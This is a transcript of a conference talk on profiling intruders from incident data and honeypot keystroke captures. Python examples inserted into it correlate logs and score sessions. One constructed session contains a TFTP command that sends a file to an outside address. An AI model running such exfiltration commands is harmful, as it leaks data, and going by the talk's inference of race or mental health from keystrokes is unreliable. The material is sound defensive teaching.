Hello. Good morning, everybody. This morning's talk is going to cover analyzing intrusions and intruders. It's kind of a deeper look at network incident response, intrusion analysis. Okay, so this presentation is significantly changed from the one on your CD, but I've already provided this to DEF CON last night, so it'll be on the website after my talk sometime today, hopefully.

Who am I? I'm Sean Bodmer. I'm a computer science, criminal science researcher. I've spent a lot of time researching honeynets over the last six years. I'm not an expert behavioral profiler, nor do I work for the Department of Justice or have any background within that specifically. Intrusion analyst by trade; I spent the first few years doing penetration testing, exploit analysis, signature generation for IDSs, IPSs, and the last six years specifically dealing with incident response, intrusion analysis, and honeynets. And I'm also building a thesis on attacker and threat profiling.

Why am I here? I'd like to convey some concepts and methods that you all can hopefully walk away with and better protect your networks and better understand threats that are actively coming against your network. So basically this whole talk is going to cover The Silence of the Lambs meets the silence of the ram, in a sense.

Okay, so everybody's challenged, right? How do you better understand the threats? You get hacked, you have an incident occur on your network. How do you understand what the motive and intent is? How can you take that information, when you understand it, and better use that information to put in stronger protections in your network? How do you effectively communicate what just happened on your network to your leadership? How are they going to give you more budget? How are they going to allocate you more resources to increase the security protections or training? Overall, the foundations of this talk are going to basically be founded in behavioral profiling.
Yes, it has negative connotations in the media and the press, but it's been used for a very long time and very successfully. I think statistically it's like 70, 72% on average; behavioral profiling does work. It's not 100%, it's not the silver bullet, but it does work. You can use this to analyze patterns of an attack, focus on the behavior, the skills and abilities. You can look at the code that's being used against your network and see if it's custom, if it's not. Motivation: what are they going after? Your finance information, your logistics, operational, corporate espionage. Complexity of the attack: how hard was it? Accessibility to the resources. This is the foundation I'm going to build on from here.

I'm going to bring you all the way back about 100 years ago, 1888, Jack the Ripper. This is where behavioral profiling started, the first case profiling was actively used. Without ever finding Jack the Ripper, they were able to build a profile of Jack. Still today nobody really knows who he was, but they infer a lot of personality traits about Jack the Ripper. They have all his victims, they have the dates, circumstances of death, and how they were harmed. You can relate all this information to your network. What happened? What OSes did they hit? What services? What tools were dropped? What files were altered? What was taken? What presence was left? From an intrusion analyst's perspective, you can relate all this information that's already there to what you're doing on a day-to-day basis. You can develop patterns and signatures of an attack if you can write your own custom host-based signatures.

Okay, so with Jack the Ripper, they never found him, right? But they have a lot of suspects, right? They have all these plots: the royal plot, he was a doctor, how the bodies were mutilated. Some say he was, some say he wasn't. It's a still-ongoing debate. Jack the Ripper's crimes were disorganized. Some of them thought that it was a passion.
Organization, knowledge of your environment. So did he know the streets where he was murdering, committing his crimes? Does your intruder, who's hacking your network, seem to know exactly where your systems are? Does he know where your users are, where your files are stored, where your key assets are located, if you have a very large enterprise? Also, is he extremely skilled with tools? What kind of tools is he using? Stuff from open source, or is he customizing his own tools? That can help you build off that profile of Jack, right? This is kind of an overall basic profile of Jack. I pulled it from several different sources right here. So you look at Jack and you see, okay, there's all these assumptions about Jack the Ripper. You can make the same assumptions about your attacker. Try to narrow it down. And it's all at least trying to understand your threat. Are you dealing with some kids? Are you dealing with organized crime? Somebody who's a disgruntled employee, or something even worse?

So like I said, there's over 100 years of this experience right now that you can use as information security professionals. You can go on the internet and read. You can go buy books. You can research till your head turns blue. That information has already been built, and the Department of Justice folks, the law enforcement types, you all, this is not new to you. You all have been doing this for decades, over a century. And so this is all really for the security guys, network guys who don't really think about this stuff or haven't, and where you can walk away and put this into your program.

So now the information systems are at a point where all the heavy lifting is done by your automated systems, your security systems. It leaves you time to do the heavy thinking, right? Well, you can implement that a little bit better with recursive learning, whether it be AI, automatic signature generation, managed security services, groups, and on-site contractors, right?
So there's different ways that you can kind of build up in certain areas to help take all the leverage, all of your time; instead of worrying about all the logs, you can filter it all with different tools that are commercially available.

All right, so getting a little scientific: criminal investigative analysis. Yep, you can go on Wiki, you can go on the Internet and read all about it. That's not something that you specifically do, but it's a good resource that you can go read about and walk away with, right? The basis of it is reviewing crimes from a behavioral aspect, assessing the facts about what happened and interpreting what the attacker did. So what you see happen, if it's a very clean and organized attack, or if it's very disorganized and seems slightly opportunistic, then it gives you two different types of threat profiles. This is a pull-off of law enforcement code: a person's basic behavior exhibited in a crime scene is also present in their normal lives. You can infer that any way you want to. But it will help you determine, especially if you're working in commercial space, it gives you the ability to see what's going on in your attack and go back out and do research on your attacker. Sometimes in code that you see, if you reverse it and go through the email addresses, IP addresses, specific keywords, you can go back and find a hacker group website or somebody's MySpace account that has all their information on it, just by finding a keyword in the code, right? And that right there allows you to better understand what is coming at you.

Okay, so again, we'll cover technical threat analysis, threat modeling. This has been around for several years. So, common components: you look at potential attacks, weigh the threats to your network and the risk, right? So if it says vulnerability, risk, people's threat, whatever.
Analysis: you start to look at what's going on in your network, what's trending, what's happened, and then what you can do to countermeasure that. What kind of measures you can implement in the future as stronger protections, which lead to future preparations. A common analysis approach: locate vulnerabilities, classify possible attackers. So if you're running a bank or financial system, who could possibly want to get into your network and take your information, whatever it may be? Identify the goals of an attacker. Okay, so you know your valuables and then you say, okay, well, these groups of people may want to get into my systems. You look at your vulnerabilities and say, okay, these are the ways that they could get in, and you try to safeguard those as much as you can. And then create a resolution plan. If this happens, I know to go look at these systems. I know these are my weak points, right? And everybody always looks at the users as your weakest link.

So people have looked at criminal science and people have looked at computer science. It's basically two separate worlds. And right now, I see a lot of IT information security personnel that I work with and I work for and consult to; they do a lot of post-mortem analysis, right? Something happened and they respond to that. They're not actively looking right now and keeping on track and understanding what's going on. They wait for something to happen. They pull the hard drive. They review it. They go through their logs, but it's already happened. So there's no way to, you know, how do you respond to that? Your data is already gone. You're already toast. So it is possible to be a little proactive about it and implement these other sciences into your security program to make you a little more proactive. So you're not always responding to something. You're actually doing something, so when something happens, you're significantly more prepared.
Behavioral profiling, yet again, negative connotation, but it can define one aspect of understanding your threats and understanding attackers that want to do you harm. Okay, so it's here. It's now. You know, in my humble opinion, everybody, at some level, you have thought about this: who wants to break into my network, who wants to do me harm? But there's really a lot of resources that you can go read about to help you better understand it. I have an entire bookshelf full of several books on criminal profiling, criminal sciences, and UK studies that has helped me relate a lot of intrusions that I've seen to, you know, these serial murders and criminal case studies: really how they found them, how they identified it, how they enumerated who did it, right? Attribution. So you can create, you know, models of this. You can create go-by programs to help build stronger models depending on what kind of network or enterprise you're working with. And if you understand that, you understand your threats, you can understand where you may be going next, where the attackers may be going. The latest threats: okay, you know, this new exploit came out, okay, I have six servers that have this vulnerability. Yeah, I can patch it. How fast can you patch it before they hit you? And how much of a threat, how large and strong is the threat? How fast are they going to respond to that zero-day that just came out?

Okay, so this, you can be Columbo now. You can sit here on your network and think about things that, you know, when the power goes out and you're all alone, it'll keep you up at night. So when you do an intrusion analysis, you can guess about what happened, you can try to put pieces together and make a lot of assumptions, or you can really look at all the facts, bring all your data sources together, and try to really peel away the needles in the haystack and put them all together: okay, you know, this pattern happened over the network.
If you have some session-based monitoring tools, you can look at the session of what happened and kind of tie it all together, and it should be this one attack, to maybe this one attempt was the same person over here in these five other places, right? So you start to build this big story on your network.

Okay, so here, this is a sample, you know, cybercom investigation, you know, intrusion investigation. So you assess the scene, you collect your evidence, put all your data sources together, document, document, please. Analyze what happened: you know, network forensics, host-based forensics, you know, reversing most of the code, whatever, you know, whatever tools you use. Assessment, right? So you see what happened over the network, over the host. You put it all together, and then you just try to build a profile, a threat profile, an attacker profile of the intruder or the group that just came at your network. And then you try to generate an intrusion report that has all this combined information in it and give it to your senior leadership to let them know how big of a threat just came at their network, whether it was some kid just using some tool he downloaded, or this is something serious, or, you know, I need, you know, more tools. I need, you know, we need to call the police, get a lawyer, you know, get, you know, whoever involved to better support what just happened, especially if you're a large financial institution.

Okay, here's a sample investigative life cycle which we'll run through really quick. All right, so you have your incident, you know, awareness, consultation right when the incident occurs, preliminary analysis, you know, image acquisition, recovery, you do analysis on it. Preliminary and final report. And either you're going to go to prosecutable or non-prosecutable. You know, even if you go prosecutable you still have the bottom: containment and prevention for the future. They still kind of go hand in hand.
And, you know, if you end up in a prosecution, you know, "I swear to tell the truth, nothing but the truth," and that's entertaining in and of itself.

So where do you start, right? So an incident occurs and you have all this data, right? We've talked about how you can do, you know, behavioral profiling and intruder analysis, but when it comes down to it, you have all of these components of technology that you have to wrap your head around when something happens. Where do I start, right? Do I look for, you know, the hard drive, to look at the apps, the network logs, the hard drives? What do I do first, right? And it's all around what just happened, the body of the crime. So you have all this to go through and it's very inundating to figure out where you want to go.

So I'm going to go through a couple of case studies throughout this, okay? Haale, Mojave, Mahart, El Griton, Julio Ardita. So this is all open source information, right? This is a hacker who broke into some government organizations, colleges, and some foreign countries. So he did some very nasty things, right? But bottom line, you know, they charged him at the very bottom for years' probation, you know, had to pay some fines. Nothing too big, right? But when you look at this and you're watching this, if you were on that assessment team, right, trying to do the incident response, how would you have handled that? How would you have looked at the difficulty of his code? Consider the target, what he was going after, what systems he was hitting, where the data points were that he took the data from. What was the outcome, okay? So did he take your financial information? Logistics? Did he take personnel records? PII, whatever you want to call it. What did he take and what does it all mean to you? How much did that damage your day-to-day functions, right? And how would you analyze that?
Typology is basically typecasting or stereotyping certain groups together, you know, like the naive hacker, the organized crime, and I actually have a list a few slides down. And victimology is basically looking at what servers he hit. You know, actually looking at the victim, the target, and trying to assess, okay, so what was the value of that target that he just went after? You know, you can look up the definitions on Wiki. And there are other methods you can use, you know, just using standard digital media analysis and trying to do some kind of incident response reporting, a damage assessment. But attacker characterization is very important when you try to do this assessment, right? So attacker characterization has two primary components: events and threats. So what has occurred by the act of the attacker, and then the threat, the motives and intent of the attack, right?

So generally, session data isn't available on an attack. You're looking at some, you know, some fuzzed-up host logs. You're looking at some network logs, IDS logs, firewall logs that have more than likely been fuzzed. You know, somebody throws a lot of noise on the firewall to pass an IDS and tries to slip by, goes really low and slow and tries to throw really slow fragmented attacks. You know, it could be, depending on how important you are as a target.

Okay, so honeynet technologies, if they're available and you use them, you know, and if you don't publish them. Okay, so general consensus is that, yeah, everyone's like, honeynet, you know, bad connotations as well. But if you use them and implement them inside your network and don't advertise them publicly, you can use them, right? It gets kind of shady when you go for the prosecutable path. Work with your corporate attorney, oh man. But you don't have to; if you're not going to do prosecution, you just want to do, you know, protection, you can implement honeypots to your heart's content.
Okay, so these are the common... we need to talk about typology and breaking your threats down into groups. Here's just the groups that we use internally for the analysis team. And you see, it goes all the way down from naive, a novice, to foreign intelligence, which, you know, depending on what kind of information you're protecting, it can go all the way there. Components of an attacker profile that you can start building, and we actually have, you know, some broken-out forms that we use. First-hour information, we try to fill all this stuff out. You have motivation, objectives, timelines, resources, risk tolerance, skills and methods, actions, attack organization points, numbers involved in the attack. You may see one attack, but it could be several people involved in that attack. One person scans, one person actually injects, one person runs the shell, one person gets in and pulls the data, one person cleans up. That can happen. It can be one person from cradle to grave, soup to nuts, you know? A knowledge source, right? When I say knowledge source, that again refers to: you can have the ability to find out, you know, an email address, an IP address, a keyword that you can go Google or, you know, search for on the internet and find out more about that person or that group. And you can figure, okay, what are they about? Do they hate, you know, my company? Is it a former employee? Is it, you know, a group working to do, you know, money laundering, or, you know, they want to sell my information on, you know, IRC, whatever it may be. But that's a good information source, trying to go out and find information about that entity or person.

Common challenges in attacker characterization: the cost. How do you really effectively, you know, convey that to your leadership?
Hey, you know, we need this amount of money, you know, in addition to just making sure that the operation is going to have, you know, all this, you know, threat modeling, attacker characterization, all these extra sensors out and running. You know, the personnel, skilled talent to do analysis on the information, equipment, software, productivity. You know, most organizations, they really don't want to be inundated with all this, you know, other, you know, additional work that you have to do, this workload, especially IS staff. We have a lot to do on a day-to-day, you know, function. Why are we going to spend this extra, you know, two or three hours doing all this analysis and all these extra logs? Well, you can automate a lot of it. And technology: you know, how do you know where to put the equipment, you know, boundary protections, the continuity of operations of that equipment? You know, I mean, you have, you know, depending on what kind of guidelines you're operating under, Sarbanes-Oxley, HIPAA, you know, do you have to store that data? Do you have to have extra backups of that? And what happens when you have, you know, disaster recovery? Is your leadership going to let you have a whole other hot site or cold site for that? You know, and legal. Most lawyers get really tense and pucker up when you talk about, you know, setting up, you know, any kind of extra attacker characterization or kind of profiling systems. That depends on how you word it.

So, we talked a lot, you know, about implementing the technology, about the concepts of actually performing the work. When you're actually doing the analysis, you want to trace an attack to the insertion point.
In your first hour, when you find out something's happened, you try to find the best, you know, that point of entry, right, and try to trace it back, because that first device, like, you know, most ISPs, they dump their data in 24 hours, so you have 24, 48 hours to find out where that attack came from before all your data's gone. But that data, you know, even though of course an IP doesn't mean too much, it still helps you understand what might be happening and, you know, how, what, who, when, why, and where, you know; it's a big piece of the pie. Acquiring all of your internal assets: if you run a major enterprise, it's across, you know, several countries or, you know, several states across the country, how do you get all those pieces together really quick, you know, before the logs are erased or before something's damaged, or that attacker, as he's getting out of your network, you know, you don't have access to the site, whatever it may be, and they're deleting those logs when you're finding out in your Philadelphia office that, oh, you know, something just happened. So getting all that information together really quick and storing it, that's really important. Postmortem is reactive and not proactive. If you're not implementing technologies to actively monitor, you know, the anomalous behavior, you know, you're fighting a never-ending battle. It's completely uphill and you're just going to fall down.

Datastream Cowboy and Kuji, okay, so 26 days of attacks, 20 days of monitoring. A lot of sniffers. So look at the overall damage, and that's the damage just to the computer systems. That doesn't cover the costs associated with the time, right, to take all the personnel to rebuild all those systems. The information lost, as with case study B, right, there's a defined, you know, monetary number with all that. That hasn't, you know, ever been totaled. If you looked at that and you were trying to define, you know, how bad is this stress?
So think you're all on the receiving end of this and you find out there's all these sniffers loaded on your network. There's all this data going out of your network. Okay, the tools that are running on your network, how good is the code? You know, is it very common? Again, is it open source? Common tools. Who would you consider the target? How would you consider it, right? Would you look at what just happened to you and try to figure out, okay, so what does this all mean? Are they taking, like, if I'm building, like, an airplane, are they taking, you know, different pieces of it from different sites to all take it back and build a nice plane for themselves because they're starting up their own airline? Could you look at the typology and victimology, put them together and assess the situation? Could you look at, okay, so I think that this information is highly valuable and it could end up on the black market or in another country or, you know, specifically the black market, and look at your target, your victim. What does this all mean to me? What service did they take? Again, you know, what applications, what files with information.

So, giving you kind of a light run-through of when you see an intrusion, how would you kind of look at it, right? So you have this information on your attacker, and this is what I actually use to build, you know, profiles after an intrusion. This is what I do on a day-to-day basis. Gender: content analysis, you know, can you see inside the code? Can you look on the internet and see, you know, if this is a male, female, can you do research on that? I said on the internet. Age: older, younger, you know, middle-aged. Command use, keystroke use: if they're using some really old commands, you know, Windows, Unix, you can infer that they're older, younger. There's things like that that you can use.
Sometimes, you know, people can be aware that you're doing that and throw you off with some, you know, a young person using older commands. They can do things like that. Typology, methodology, content analysis: looking at the pcap of the attack, what actually happened in the flows. Race, ethnicity: can you tell if they're from a foreign country? Can you tell if they're local? What region of the country they're from? What part of the world they're from? You can do that. What's this one? Talk about command use and keystroke use, and that's related to honeynets and honeypots. So, you can also do level of intelligence and schooling. How well educated are they, is your attacker? And that can also mean you can infer from the level of intelligence and schooling what kind of threat you're up against, right? What kind of, who wants to do you harm? Whether this person is highly funded and well educated; you really don't find highly, highly, highly educated people doing, I mean, you know, masters, PhDs, I'm referring to, doing a lot of major hacking. I mean, you find some people doing it, but as far as doing cross-organizational intrusions, unless they're highly funded, PhDs and masters are normally at work. Political affiliations, you know, are they an extremist group? Are they with some, you know, environmentalist group? Whatever it may be, there's, you know, you can identify that, potentially, by going out and doing, you know, research on the internet, looking at content analysis, you know, what's going on. External data sources: if you find out that somebody else has been attacked by the same entity, by the same group, you can kind of put your heads together and go, okay, well, we think, because our two organizations have these, you know, functions, that it could be this kind of group coming after both of us. Physical, mental health: we've all seen the movie Swordfish, right?
So, you know, the guy's like, you know, hack this bank or I'm going to shoot you, same type of thing, you know. Don't know if you've ever seen that before, but it can happen. And you can also see, are they narcissistic, do they have any kind of, you know, manic depressive, bipolar disorders, you know, what are their patterns of attack?

So, you want to construct your assessment. You know, you do your triage of the initial incident, your case overview, and your victimology, and you look at the attack. History hotspots, nature of the information targeted, you know, again, victim system functionality. Vulnerability exploits: is there any disclosure history on the internet about that attack, or disclosing the attacks? M.O., modus operandi: signature, content, patterns. Can you look at any of that, any attack, and can you correlate it across multiples? Utilization of the access. So, how often, when they got into your network, did they use it? Did they get in for a few minutes and just back away? Did they get in, and were they so comfortable on your network that they found other user accounts, logged in as other users, you know, overnight for hours and hours and hours, logged in to multiple locations and just took all kinds of data and, you know, wove it out of your network? How do you look at that, right? How well? And the data transfer technique: did they just FTP it out, did they SCP it out, did they use one of the encrypted, you know, channels out, you know, and that can help you infer the skill level and motive and intent of your attacker. Logging alteration, you know, deletion techniques: did they modify the host at all? Did they take care to cover their tracks or did they not? How brazen were they? That's how you can, you know, sort of build this information about your attacker, right? It's a little profile. So you're going to analyze session behaviors. Did I copy this one? No, I think I did.
Okay, so if there's session data available, you can look at the knowledge of that attacker of your environment. System locations, right, system functionalities: if it knew where it was on that, you know, VLAN, it knew that that was the mail server, it knew that this was the backup file server. If you have a major enterprise and you have your own proprietary naming convention, right, how well were they in your network, and how well did that entity know it before they got in your system? Do they know exactly where to go, or do they have to putz around for a little while and do some, you know, net views or whatever to get in the system? They know exactly what folders and files without doing any greps or directory searches, right? Exactly that your vice president was, you know, in that office, in that state or in that network. Whether the attack was scripted or not, and how often does the attack generate typos. So, like, let's say you have a fat finger and you always mess up Q and you're always having to, you know, backspace and delete that. If you have session analysis or session analysis systems, you can really look at all that data and really build a good understanding of your, you know, attacker.

Okay, so implementing session analysis, you know, again, honeynets, honeypots. So, I'm going to show you a few sessions that we've collected, and they've all been scrubbed, but this information has been involved in a couple of things that I've worked on. So, I don't think you can see this too well, but it's on your CD and I've kind of cleaned up some of the text on the CD. It took out some of the MySQL statements. But, basically, you see the person, you know, ipconfig, look at another box, and went down systematically and went through: look at the domain, directory to some tools, TFTP some stuff out, you know, echoed, pulling stuff out to a file, right?
Outputting all this information from the server to a file, took out the file, renamed his tool to a nice tool, went down, pinged some other system, did some discovery on some other systems on the network, and knew exactly where to go, copying some of these files in, right? So, bang. How often did this attacker really dig around and look for a whole bunch of systems, right? This actually happened very fast, about a half an hour's time. So, this person, this entity, knew exactly where to go and was just testing to make sure some systems were up and logged in. But it was very quick, very fast, highly educated. You know, don't know about the resources of that entity, but it was very fast, highly educated, they knew exactly where to go. So, but you can see that they went down, found some passwords on the local system and kept digging, burying deeper and deeper in, right? Found some passwords, looked at some more systems, copied over some more files on some other systems. So, you can see they're just pulling out the data, pulling it out, pulling it out, right? Very fast.

So, after you look at this, right, and this is actually about six pages printed out of a honeypot capture, how would you have analyzed or evaluated the attack, right? You can look at the network data and you can look at the signatures created and kind of put them together and then say, okay, here's the session data, and match all that up and build a very good profile and understanding of your attacker. Was it sophisticated, motivated, targeted, opportunistic, organized, disorganized (it's a good criminal science term), and then automated, a lot? Was it scripted? Did somebody prepare all this? Did somebody prepare this kind of information, this attack, very quickly? You have to have an extreme knowledge, a very deep knowledge of your internal network, your day-to-day operations.

Okay, honeypot capture two. Okay, so basically the person, this is kind of a putz around on a DMZ.
Somebody was looking around for something. So we see that they're just kind of digging around, looking for something, and they're not really doing too much. They're just trying to do some discovery, and it's not that very long of a capture: two and a half pages. So you can see, and I will say that I actually messed up on this one when I set up my honeypot and actually left, in the recent documents, a link; I left the little cvac.zip file in there, so they discovered it pretty quick. So, don't do that. So they go through and try to dig around the system, dig around for some domains, right? Nothing too fancy, nothing too good, but they did try to pull out some data to an external IP, which is fuzzed. And you can see that they tried to make a lot of noise on the network, to pull out the IDS logs. So, you know, not too sophisticated. Somebody's poking around for an empty box to pivot off of. You know, like I said, not too sophisticated. Motivated? They never came back after that. It looked opportunistic, not really targeted, because that IP or that presence really hadn't scanned like that or hit that service on that honeypot before. Automated? It was live. There was a live person digging around that network. They just kind of made faux pas like that and made those typos.

So, session capture three. This is actually much shorter, but you can look at it. Somebody's just digging around, looking at a domain that they just tried to get into. And this was a web server domain, and they hit a server, tried to look for some documents, recent documents on the system, tried to do some other queries, and made a lot of noise on the network. But it wasn't very sophisticated. No. They looked around, and they left after a while. And this right here was about an hour of digging around. Session capture two was about an hour and a half. So they never came back; they never did anything more with this system.
So it wasn't sophisticated, wasn't very motivated, because they never came back; that presence never hit that honeypot again. Didn't really seem targeted. They were kind of wildly searching; they weren't searching for anything specific. Seemed kind of disorganized. They didn't know exactly where they were going, what they were going after. And it was live, all the typos.

So, Carlos "Smak" Salgado. So here's another hacker; ended up with a large fine, two and a half years in federal prison, made about $200,000 selling credit cards. So if you're an online financial company, you have threats like this every day. You can go on the Internet and the IRC underground, find all kinds of credit cards you can buy every day for $1, $10. So if you had been a part of this on the financial side, trying to figure out what was going on in your network, how would you consider the difficulty of what he was doing? Was all this information easily accessible? Maybe a few security controls in place? How would you consider the target? Very easy to get. So this is financially based. Is it financially motivated? You can look at the outcome: you can see them holding my credit card information, so you can deduce it's probably going to end up on the underground Internet. So you can probably get on another box, get on the open Internet, and try to find your credit cards, or any of those numbers out there, fishing around. Typology: what type would you have fit them in, of all those common attacker types that I threw out there? That financial data that was out, you can look at that: the e-processing server, all my credit card data was stolen, what app did he get through? You can put that information together for your official report.

I can't go over all the theory. I mentioned some tools. In your toolkit, in my toolkit, we use network IDSs, host-based IDSs, firewalls, antivirus, router logs, honeypots, honeynets, host-based analysis, and system event logs.
You'd be surprised how many attackers forget to delete certain web logs, certain event logs, when they're trying to cover their tracks. In order to catch someone crafty, you need to be crafty. Honeypots and honeynets. How many attackers really expect you to deploy a few honeypots outside your network? Not many, right? I know in the past few years it's gotten more and more prominent and people are starting to look for them. Not as many as they used to; they still don't look for them. On any honeypot that I've helped set up, I rarely ever see them look over their shoulder and try to dig for a honeypot. Except for that one time, because I was stupid enough to leave it in the recent documents folder. The security of a resource lies in your ability to be able to use it. You want to make your honeypot look as close to your current environment as possible: host name, naming convention, user names. Take some fake data, some used data from your network, and dump it on that box. When they're doing that directory grep search, they can find the docs and spreadsheets and PowerPoints and any kind of recent temporary internet files. Make it look a little realistic. That's a huge thing. If an attacker gets on your honeypot and sees nothing within the first five minutes, it's right there, because every box in the network has a whole bunch of data on it. So you really have to make it do something.

So, honeypots, advantages. You collect a small amount of data, only what hits it, but everything that comes to it, you can infer is completely malicious or suspicious. Reduces your false positive rates and helps you correlate instead of looking through the whole haystack. All you see is needles in a honeypot. That's all you see. You see this here, and look across your entire enterprise really quick and go, where else am I seeing this? And you can go back and say, have I seen this a week ago? A month ago? A year ago? If you have logs that long, see how low and slow this person is.
Catches new attacks. Works in encrypted and IPv6 environments easily. Simple concept requiring minimal resources, depending on how you deploy them. Disadvantages: limited field of view. If you set it up incorrectly, they can use your honeypot to attack the rest of your systems, or other companies, or other countries, whatever it may be. Automation isn't perfect, but if you put some resources into it and buy some commercial tools, it works out a little better. Many types available. High-interaction honeypots, which are full-blown systems: they don't scale too well, and they require a lot of resources, including host-based analysis and network analysis on full-blown systems. Low-interaction systems: they can scale very, very well, but they're purpose-specific, and most of these low-interaction honeypots don't trick an attacker into actually getting into the system. It's just for scanning and early warning on a network.

So here's a few screenshots of actually the Roo OS, which is the latest version of the iteration. And you can see, this is all sample data that was pulled off of Google Images, but basically you can see the attacks, the times, the process IDs of what actually occurred, the directories, what the person is doing. So all those keystrokes that I showed you would be in the bottom of this window, and you can easily look at it really quick: okay, so what's going on? What process is he using? Where did he come in? You can look at the information that we do a lot of. You can sit there and correlate the time, the event, source IP address, destination, and custom signatures. The signatures related to it build you a network profile of your attacker, and then you go look at the host-based part of it, and even your production systems, not even your honeypots, and you can match up the event logs with the honeypot session capture and go, okay, so he's doing all these things, or she or that entity is doing these things.
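Added example, not from the talk and not the Honeywall tooling pictured on the slides: the two pivots described above, written out in Python. The first takes every source that touched a honeypot (suspect by definition) and looks back through enterprise logs to answer "have I seen this a week ago, a month ago, a year ago, and how low and slow is it"; the second lines honeypot events up against production event-log entries from the same source within a time window, so the keystroke capture can be matched to what happened on real systems. The log line format, the addresses (documentation ranges), host names, timestamps and the "current time" are all constructed for the example, and the low-and-slow threshold is an assumption to tune.

```python
"""Pivot from honeypot hits into enterprise log history.

Added example, not the talk's own tooling. Log line format (constructed):
'<ISO timestamp> <src_ip> <dst_host> <event>'; every address, host name and
timestamp below is made up for the example.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed honeypot events: anything that touched the honeypot is suspect by definition.
HONEYPOT_LOG = """
2007-08-03T09:15:00 203.0.113.45 hp-fs02 smb_session_keystrokes
2007-08-03T09:20:00 192.0.2.88 hp-fs02 tftp_outbound
2007-08-03T10:00:00 192.0.2.200 hp-fs02 port_scan
"""

# Constructed year of perimeter logs (firewall/proxy/VPN) to look back through.
ENTERPRISE_LOG = """
2006-09-10T02:11:00 203.0.113.45 www1 http_get /robots.txt
2006-12-02T03:40:00 203.0.113.45 mail1 smtp_connect
2007-03-15T01:05:00 203.0.113.45 www1 http_get /admin
2007-07-30T23:50:00 203.0.113.45 vpn1 ike_probe
2007-08-02T22:10:00 192.0.2.88 www1 http_get /
2007-08-03T09:12:00 192.0.2.88 fs01 smb_logon_failure
"""

# Constructed event-log entries from a production file server.
HOST_EVENT_LOG = """
2007-08-03T09:17:30 203.0.113.45 fs01 logon_success svc_backup
2007-08-03T11:00:00 203.0.113.45 fs01 logon_success svc_backup
2007-08-03T09:21:00 192.0.2.88 fs01 smb_logon_failure
"""

NOW = datetime(2007, 8, 3, 12, 0)  # constructed "current time" for the look-back windows


def parse_log(text):
    """Return (timestamp, src_ip, dst_host, event) tuples; the event field may contain spaces."""
    rows = []
    for line in text.strip().splitlines():
        ts, src, dst, event = line.split(maxsplit=3)
        rows.append((datetime.fromisoformat(ts), src, dst, event))
    return rows


def history_for_sources(honeypot_log, enterprise_log, now, windows=(7, 30, 365)):
    """For each source seen on the honeypot, summarise its history in the enterprise logs."""
    hp = parse_log(honeypot_log)
    by_src = defaultdict(list)
    for ts, src, dst, event in parse_log(enterprise_log):
        by_src[src].append((ts, dst, event))
    report = {}
    for src in sorted({src for _, src, _, _ in hp}):
        hits = sorted(by_src.get(src, []))
        if not hits:
            report[src] = {"seen_before": False}
            continue
        first, last = hits[0][0], hits[-1][0]
        span_days = (now - first).days
        counts = {f"last_{d}d": sum(ts >= now - timedelta(days=d) for ts, _, _ in hits)
                  for d in windows}
        report[src] = {
            "seen_before": True,
            "first_seen": first.isoformat(),
            "last_seen": last.isoformat(),
            "events": len(hits),
            "hosts": sorted({dst for _, dst, _ in hits}),
            "span_days": span_days,
            # "low and slow": around for a month or more but averaging well under an event a day
            # (assumed threshold; tune against your own log volume).
            "low_and_slow": span_days >= 30 and len(hits) / max(span_days, 1) < 0.2,
            **counts,
        }
    return report


def host_events_near(honeypot_log, host_event_log, window=timedelta(minutes=10)):
    """Production host events from the same source within +/- window of a honeypot event."""
    matches = []
    for hts, hsrc, hdst, hevent in parse_log(honeypot_log):
        for ts, src, dst, event in parse_log(host_event_log):
            if src == hsrc and abs(ts - hts) <= window:
                matches.append((hsrc, hdst, hevent, dst, event, (ts - hts).total_seconds()))
    return matches


if __name__ == "__main__":
    print(json.dumps(history_for_sources(HONEYPOT_LOG, ENTERPRISE_LOG, NOW), indent=2))
    for m in host_events_near(HONEYPOT_LOG, HOST_EVENT_LOG):
        print("honeypot %s on %s (%s) <-> %s on %s, %+.0fs" % m)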
Okay, so you can infer what's going on here, and you can try to see the skill and intent. Again, this is another one. What I want to talk about, a person at the bottom here: you see a delete, delete, delete, delete, right? So that person just kept trying to... so if they have a fat finger and keep hitting Q, that's also a pattern in the signature that you can put on somebody right there. Here's another one, so, process. So most of us have tools; when you do pen testing, you go into a system and you have your first few things that you do. You check the environment of the box. You try to set your own environment, set your own shell, however you try to play with it. But you always go through some specific services that you want to get to, right? Some commands you kick off, and you can kind of infer that, hey, honeypot A and honeypot B, there's some relation here to how this person behaved. These two attacks are completely different. Different entities, different personalities, different methods, different modes, right? They jump from one to the other.

So here goes some nerd stuff. I'm going to start with, sorry. So you can spend more time analyzing attacks and spend more time performing analysis on these intrusions, right? Just don't rebuild your hard drive and keep going. I know most senior leadership, they want you to take out that hard drive, rebuild it, smack it back in, and just keep marching on, right? They don't care about what happened; they just want to check that box, day-to-day operations, bring that money in. But that's not going to keep the threat out. It'll just keep persisting. You can perform victimology and typology on the attacks yourself, which will help you have a better understanding of what you're up against and what kind of protections you need to implement. You can build a profile of the incident. You may see crossover.
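Added example, not from the talk: the session-analysis features discussed in the keystroke captures above (typo and backspace frequency, how much discovery happens before the session goes for a target, the pacing that separates a live operator from a script, and which hosts the session reaches for) extracted from a honeypot keystroke capture in Python. The capture format, the ^H backspace token, the three sessions and the decision thresholds are all constructed or assumed for the example; the numbers are a starting point to tune against your own captures, not the speaker's.

```python
"""Feature extraction over a honeypot keystroke capture.

Added example, not from the talk. The capture format (one command per line,
'<epoch seconds> <pid> <command>', with every backspace the intruder typed
recorded as the token ^H) and the three sessions below are constructed.
"""
import re
import statistics
from dataclasses import dataclass

# Commands that mean "looking around" rather than going straight to a target.
DISCOVERY = ("ipconfig", "ifconfig", "net view", "dir", "ls", "find", "grep",
             "netstat", "whoami", "systeminfo", "ping", "nslookup")
# Commands that stage tools or move data off the box.
TRANSFER = ("tftp", "ftp", "copy", "xcopy", "scp", "wget", "echo", "type")
# UNC host names (\\HOST\share) and dotted IPv4 addresses the session reached for.
HOST_RE = re.compile(r"\\\\([A-Za-z0-9_.-]+)|\b(\d{1,3}(?:\.\d{1,3}){3})\b")

# Constructed session 1: fast, typo'd, goes straight to a named file server and out via TFTP.
SESSION_A = r"""
1000.0 412 ipconfig /all
1004.5 412 net use \\FS-BACKUP01\finance$
1013.2 412 dir \\FS-BACKUP01\finance$\q2
1016.0 412 copy \\FS-BACKUP01\finance$\q2\*.xls c:\temp
1021.3 412 copy c:\temp\ledger.xls c:\temp\updaet^H^H^Hate.dat
1024.8 412 tftp -i 198.51.100.7 put c:\temp\update.dat
1030.1 412 del c:\temp\*.xls
"""
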